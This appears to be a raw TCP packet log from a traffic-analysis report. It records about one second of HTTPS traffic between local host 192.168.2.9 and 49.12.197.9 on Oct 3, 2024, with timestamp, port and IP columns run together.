                                                                                                                                                                            Oct 3, 2024 03:27:11.815531015 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.815584898 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.846527100 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.846551895 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.846699953 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.846699953 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.846709013 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.847404003 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.884702921 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.884727001 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.884821892 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.884821892 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.884830952 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.885314941 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924626112 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924649954 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924734116 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924734116 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924743891 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.924964905 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.942440987 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.942466021 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.942696095 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.942709923 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.942756891 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954185009 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954207897 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954452038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954452038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954462051 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:11.954690933 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311446905 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311486006 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311538935 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311685085 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311685085 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311707973 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.311754942 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312263012 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312309980 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312352896 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312362909 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312406063 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.312406063 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319381952 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319452047 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319511890 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319523096 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319583893 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.319583893 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321027994 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321088076 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321299076 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321346045 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321445942 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321458101 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321481943 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321535110 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321535110 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321715117 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321715117 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321724892 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.321871042 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.325354099 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.325403929 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.325556993 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.325566053 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.325583935 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.326062918 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327018023 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327064037 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327403069 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327403069 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327410936 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.327577114 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329392910 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329437971 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329487085 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329493999 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329533100 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.329552889 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331651926 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331700087 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331748962 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331764936 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331792116 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.331871033 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333084106 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333128929 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333209038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333209038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333216906 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.333326101 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334070921 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334112883 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334177971 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334186077 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334203005 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334228039 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.334966898 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335016012 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335069895 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335077047 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335153103 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335153103 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335875988 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335923910 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335974932 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.335982084 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.336029053 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.336029053 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.336915970 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.336956024 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337021112 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337028980 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337043047 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337148905 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337728977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337775946 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337830067 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337837934 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337893009 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.337893009 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338771105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338836908 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338885069 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338893890 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338916063 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.338977098 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339368105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339435101 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339484930 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339492083 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339512110 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339555025 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339612007 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339663029 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339694977 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339701891 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.339752913 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340194941 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340667009 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340708971 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340753078 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340759993 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340780973 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340821028 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340845108 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340893030 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340936899 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340944052 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.340982914 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341259003 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341655016 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341703892 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341794968 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341803074 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341928959 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341928959 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.341990948 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342031956 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342061996 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342067957 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342123985 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342160940 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342637062 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342679024 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342722893 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342730045 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342822075 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342832088 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342859983 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342905998 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342955112 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342955112 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.342964888 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343041897 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343041897 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343429089 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343473911 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343560934 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343560934 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343569040 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343620062 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343674898 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343678951 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343678951 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.343698978 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344012022 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344012022 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344104052 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344145060 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344196081 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344202995 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344274044 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344274044 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344312906 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344356060 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344480038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344480038 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344487906 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344784021 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344813108 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344861031 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344990969 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.344990969 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345000029 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345046997 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345093966 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345138073 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345189095 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345199108 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345215082 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345240116 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345292091 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345304966 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345336914 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345375061 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345479012 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345479012 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345652103 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345701933 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345752954 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345760107 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345787048 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.345824003 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346025944 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346065998 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346116066 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346122980 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346244097 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.346245050 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350467920 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350492001 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350802898 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350802898 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350812912 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.350934029 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383616924 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383701086 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383824110 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383866072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383866072 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383877993 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383910894 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.383914948 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.384207010 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.384207010 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405309916 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405354977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405438900 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405452013 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405510902 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405510902 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405576944 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405616999 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405682087 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405688047 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405874968 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.405874968 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.412220955 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.412241936 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.412395000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.412403107 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.412487030 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.421823025 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.421865940 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.421936989 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.421943903 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.422063112 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.422063112 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.430860996 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.430905104 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.431108952 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.431108952 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.431118965 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.431175947 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.439184904 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.439243078 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.439312935 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.439322948 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.439384937 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472294092 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472368956 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472556114 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472556114 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472563982 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.472613096 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.493949890 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.494018078 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:12.494126081 CEST49727443192.168.2.949.12.197.9
